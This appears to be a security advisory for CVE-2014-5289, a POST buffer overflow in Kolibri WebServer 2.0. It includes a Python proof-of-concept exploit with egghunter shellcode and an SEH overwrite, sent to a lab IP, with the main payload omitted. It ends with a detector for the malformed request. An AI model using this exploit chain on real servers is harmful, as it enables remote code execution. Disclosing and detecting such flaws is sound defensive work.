Release date: 2014-08-17    Updated: 2014-08-19

Affected systems:
SENKAS Kolibri WebServer 2.0
SENKAS Kolibri WebServer

Description:
BUGTRAQ ID: 69263
CVE(CAN) ID: CVE-2014-5289

Kolibri is a simple HTTP server that serves static web content, licensed under GPL v3.

Kolibri 2.0 and other versions contain a remote buffer overflow when handling an overlong POST request; an attacker can exploit it to execute arbitrary code in the context of the affected application.

<* Source: tekwizz123 *>

Test method:

Warning: the following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

----------------------------------
#!/usr/bin/env python
# Kolibri WebServer 2.0 POST buffer overflow (CVE-2014-5289) PoC by tekwizz123
import socket

# [*] x86/alpha_mixed succeeded with size 636 (iteration=1)
buf = b"\x45\x44\x44\x43\x45\x44\x44\x43"  # TAG that the egghunter searches for
# The 636-byte alpha_mixed-encoded payload that followed the TAG in the
# original listing is an opaque encoded blob and is omitted here.

# Skape-style int 0x2e egghunter: scans memory for the TAG and jumps to the payload after it
egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x45\x44\x44\x43\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

overflow = b"A" * 12
overflow += b"A" * (790 - len(overflow) - len(egghunter))  # pad so the egghunter ends at offset 790
overflow += egghunter
overflow += b"\xEB\xD9"  # nSEH: short jmp back (EB D9) into the padding just ahead of the egghunter. This offset seems to work against Windows 7 Professional, fully updated as of August 5th, 2014
overflow += b"A" * 2
overflow += b"\x50\x45\x62"  # SEH overwrite 00624550 aka pop pop ret from the binary itself.

# A lot of this is the same as exploit 34059 from exploit-db

buffer = b"POST /" + overflow + b" HTTP/1.1\r\n"
buffer += b"User-Agent: Wget/1.13.4\r\n"
buffer += b"Host: " + buf + b"\r\n"
buffer += b"Accept: */*\r\n"
buffer += b"Connection: Keep-Alive\r\n"
buffer += b"Content-Type: application/x-www-form-urlencoded\r\n"
buffer += b"Content-Length: 4"
buffer += b"\r\n\r\n"
buffer += b"licenseID=string&content=string&paramsXML=string"

handle = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
handle.connect(("192.168.62.130", 8080))  # target host and port from the original PoC
handle.sendall(buffer)
handle.close()
----------------------------------

Recommendation:

Vendor patch:

SENKAS
------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:
http://www.senkas.com/kolibri/
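As an added defender-side example (not part of the advisory and not Kolibri code), the following Python 3 function flags HTTP requests shaped like this trigger: an overlong, padded POST request target carrying raw non-printable bytes. The 512-byte limit and the two sample requests are constructed assumptions, not values from the advisory.

```python
import re

# Constructed threshold: the PoC above sends a request target of roughly
# 790 bytes of padding plus the SEH records, while a static-content path
# served by Kolibri is far shorter than this.
MAX_TARGET_LEN = 512

REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/1\.[01]\r?\n")


def inspect_request(raw):
    """Return the list of reasons `raw` (bytes of one HTTP request) looks
    like the CVE-2014-5289 trigger; an empty list means nothing suspicious."""
    reasons = []
    m = REQUEST_LINE.match(raw)
    if not m:
        return ["unparseable request line"]
    method, target = m.group(1), m.group(2)
    if len(target) > MAX_TARGET_LEN:
        reasons.append("request target is %d bytes (limit %d)"
                       % (len(target), MAX_TARGET_LEN))
    # A URI should be printable ASCII; raw control or high bytes in it are
    # the signature of machine code or an address smuggled into the path.
    if any(b < 0x20 or b > 0x7e for b in target):
        reasons.append("non-printable bytes in request target")
    # Long runs of one byte are the padding used to reach an overwrite offset.
    if re.search(rb"(.)\1{255,}", target):
        reasons.append("run of 256+ identical bytes in request target")
    if method == b"POST" and reasons:
        reasons.append("method is POST, matching CVE-2014-5289 trigger")
    return reasons


# Constructed samples: a benign GET and a request with the PoC's shape
# (790 bytes of padding followed by two raw bytes; no payload at all).
BENIGN = b"GET /index.html HTTP/1.1\r\nHost: 192.168.62.130:8080\r\n\r\n"
SUSPECT = (b"POST /" + b"A" * 790 + b"\xeb\xd9" + b" HTTP/1.1\r\n"
           + b"Host: 192.168.62.130:8080\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, inspect_request(req) or "clean")
```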